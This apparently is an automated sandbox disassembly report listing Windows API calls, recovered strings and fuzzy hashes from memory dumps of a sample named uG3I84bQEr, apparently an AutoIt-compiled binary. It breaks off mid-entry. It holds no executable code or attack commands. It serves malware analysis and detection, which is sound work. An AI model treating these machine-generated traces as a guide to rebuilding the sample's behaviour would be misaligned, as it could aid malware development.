                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                            • String ID: 0
                                                            • API String ID: 1296962147-4108050209
                                                            • Opcode ID: 8f0d72dde9b3b2f8007c5173964acd19ac7deeb98eb41cbfe34375d072a7c703
                                                            • Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
                                                            • Opcode Fuzzy Hash: 8f0d72dde9b3b2f8007c5173964acd19ac7deeb98eb41cbfe34375d072a7c703
                                                            • Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 0047738F
                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
                                                            • CreateCompatibleDC.GDI32(?), ref: 004773A7
                                                            • SelectObject.GDI32(00000000,?), ref: 004773B4
                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
                                                            • SelectObject.GDI32(00000006,?), ref: 00477470
                                                            • DeleteObject.GDI32(?), ref: 00477479
                                                            • DeleteDC.GDI32(00000006), ref: 00477480
                                                            • ReleaseDC.USER32(00000000,?), ref: 0047748B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID: (
                                                            • API String ID: 2598888154-3887548279
                                                            • Opcode ID: c5cc789c95bc938fc9aea6b12f7cc4ce38ae9c4c09b60207eefc23fc12c0c4d9
                                                            • Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
                                                            • Opcode Fuzzy Hash: c5cc789c95bc938fc9aea6b12f7cc4ce38ae9c4c09b60207eefc23fc12c0c4d9
                                                            • Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54
                                                            APIs
                                                              • Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973
                                                              • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA
                                                              • Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5
                                                              • Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            • API String ID: 537147316-1018226102
                                                            • Opcode ID: 617069094f817d23c4a39293313dabc7ec73f7d5ca1b4cb255023a1e9a2a01d6
                                                            • Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
                                                            • Opcode Fuzzy Hash: 617069094f817d23c4a39293313dabc7ec73f7d5ca1b4cb255023a1e9a2a01d6
                                                            • Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A
                                                            APIs
                                                            • _memset.LIBCMT ref: 00462D50
                                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
                                                            • GetMenuItemCount.USER32(004C5890), ref: 00462E66
                                                            • DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
                                                            • DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
                                                            • DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
                                                            • DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
                                                            • GetMenuItemCount.USER32(004C5890), ref: 00462F16
                                                            • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
                                                            • GetCursorPos.USER32(?), ref: 00462F56
                                                            • SetForegroundWindow.USER32(00000000), ref: 00462F5F
                                                            • TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                            • String ID:
                                                            • API String ID: 3993528054-0
                                                            • Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                            • Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
                                                            • Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                            • Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 00B92543
                                                              • Part of subcall function 00B93073: _free.LIBCMT ref: 00B93090
                                                              • Part of subcall function 00B93073: _free.LIBCMT ref: 00B930A2
                                                              • Part of subcall function 00B93073: _free.LIBCMT ref: 00B930B4
                                                              • Part of subcall function 00B93073: _free.LIBCMT ref: 00B930C6
                                                              • Part of subcall function 00B93073: _free.LIBCMT ref: 00B930D8
                                                              • Part of subcall function 00B93073: _free.LIBCMT ref: 00B930EA
                                                              • Part of subcall function 00B93073: _free.LIBCMT ref: 00B930FC
                                                              • Part of subcall function 00B93073: _free.LIBCMT ref: 00B9310E
                                                              • Part of subcall function 00B93073: _free.LIBCMT ref: 00B93120
                                                              • Part of subcall function 00B93073: _free.LIBCMT ref: 00B93132
                                                              • Part of subcall function 00B93073: _free.LIBCMT ref: 00B93144
                                                              • Part of subcall function 00B93073: _free.LIBCMT ref: 00B93156
                                                              • Part of subcall function 00B93073: _free.LIBCMT ref: 00B93168
                                                            • _free.LIBCMT ref: 00B92538
                                                              • Part of subcall function 00B92096: HeapFree.KERNEL32(00000000,00000000,?,00B93208,?,00000000,?,00000000,?,00B9322F,?,00000007,?,?,00B92697,?), ref: 00B920AC
                                                              • Part of subcall function 00B92096: GetLastError.KERNEL32(?,?,00B93208,?,00000000,?,00000000,?,00B9322F,?,00000007,?,?,00B92697,?,?), ref: 00B920BE
                                                            • _free.LIBCMT ref: 00B9255A
                                                            • _free.LIBCMT ref: 00B9256F
                                                            • _free.LIBCMT ref: 00B9257A
                                                            • _free.LIBCMT ref: 00B9259C
                                                            • _free.LIBCMT ref: 00B925AF
                                                            • _free.LIBCMT ref: 00B925BD
                                                            • _free.LIBCMT ref: 00B925C8
                                                            • _free.LIBCMT ref: 00B92600
                                                            • _free.LIBCMT ref: 00B92607
                                                            • _free.LIBCMT ref: 00B92624
                                                            • _free.LIBCMT ref: 00B9263C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            • Opcode ID: 89670cf6627992ebe7301b1e63c104efdde0352742129af88144f8f53acfed13
                                                            • Instruction ID: 373099339e01d50b25471c2bcaf3f8a1cc1dd8df09614ad36802cc04055c6d11
                                                            • Opcode Fuzzy Hash: 89670cf6627992ebe7301b1e63c104efdde0352742129af88144f8f53acfed13
                                                            • Instruction Fuzzy Hash: 35310772E00305ABEF31AB79D846B56B3E9FB10351F1544B9E49AD6162DA71A980CB20
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 004788D7
                                                            • CoInitialize.OLE32(00000000), ref: 00478904
                                                            • CoUninitialize.OLE32 ref: 0047890E
                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
                                                            • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
                                                            • SetErrorMode.KERNEL32(00000000), ref: 00478BA5
                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
                                                            • VariantClear.OLEAUT32(?), ref: 00478C35
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                            • String ID: ,,I
                                                            • API String ID: 2395222682-4163367948
                                                            • Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                            • Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
                                                            • Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                            • Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 3964851224-909552448
                                                            • Opcode ID: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                                                            • Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
                                                            • Opcode Fuzzy Hash: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                                                            • Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69
                                                            APIs
                                                              • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                              • Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD
                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: SendString$_memmove
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 2279737902-1007645807
                                                            • Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                            • Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
                                                            • Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                            • Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 208665112-3771769585
                                                            • Opcode ID: 5b309dc600144d10cd4df96da033064f68b25cba8dfa7e2b119ea905bdd96dc3
                                                            • Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
                                                            • Opcode Fuzzy Hash: 5b309dc600144d10cd4df96da033064f68b25cba8dfa7e2b119ea905bdd96dc3
                                                            • Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A
                                                            APIs
                                                            • timeGetTime.WINMM ref: 00464F7A
                                                              • Part of subcall function 0042049F: timeGetTime.WINMM(?,7694B400,00410E7B), ref: 004204A3
                                                            • Sleep.KERNEL32(0000000A), ref: 00464FA6
                                                            • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
                                                            • SetActiveWindow.USER32 ref: 0046500B
                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
                                                            • Sleep.KERNEL32(000000FA), ref: 00465043
                                                            • IsWindow.USER32 ref: 0046504F
                                                            • EndDialog.USER32(00000000), ref: 00465060
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                            • String ID: BUTTON
                                                            • API String ID: 1194449130-3405671355
                                                            • Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                            • Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
                                                            • Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                            • Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F
                                                            APIs
                                                              • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                              • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                            • CoInitialize.OLE32(00000000), ref: 0046D5EA
                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0046D67D
                                                            • SHGetDesktopFolder.SHELL32(?), ref: 0046D691
                                                            • CoCreateInstance.OLE32(00492D7C,00000000,00000001,004B8C1C,?), ref: 0046D6DD
                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0046D74C
                                                            • CoTaskMemFree.OLE32(?,?), ref: 0046D7A4
                                                            • _memset.LIBCMT ref: 0046D7E1
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0046D81D
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0046D840
                                                            • CoTaskMemFree.OLE32(00000000), ref: 0046D847
                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0046D87E
                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 0046D880
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                            • String ID:
                                                            • API String ID: 1246142700-0
                                                            • Opcode ID: d199858874c66e9e4f3753e20070a5963f56ec606f14660cdbbc09dbb01e0176
                                                            • Instruction ID: f865a34610966cb3ccb6f29414af5a3955dc884533e4df89e7e1a7976a3b9bcc
                                                            • Opcode Fuzzy Hash: d199858874c66e9e4f3753e20070a5963f56ec606f14660cdbbc09dbb01e0176
                                                            • Instruction Fuzzy Hash: 39B11B75A00109AFDB04DFA5C888DAEBBB9FF48314F10846AF909EB261DB34ED45CB55
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 0045C283
                                                            • GetWindowRect.USER32(00000000,?), ref: 0045C295
                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
                                                            • GetDlgItem.USER32(?,00000002), ref: 0045C2FE
                                                            • GetWindowRect.USER32(00000000,?), ref: 0045C310
                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0045C372
                                                            • GetWindowRect.USER32(00000000,?), ref: 0045C383
                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
                                                            • GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                            • Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
                                                            • Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                            • Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14
                                                            APIs
                                                              • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
                                                            • KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
                                                            • DeleteObject.GDI32(00000000), ref: 0043BD1C
                                                            Memory Dump Source
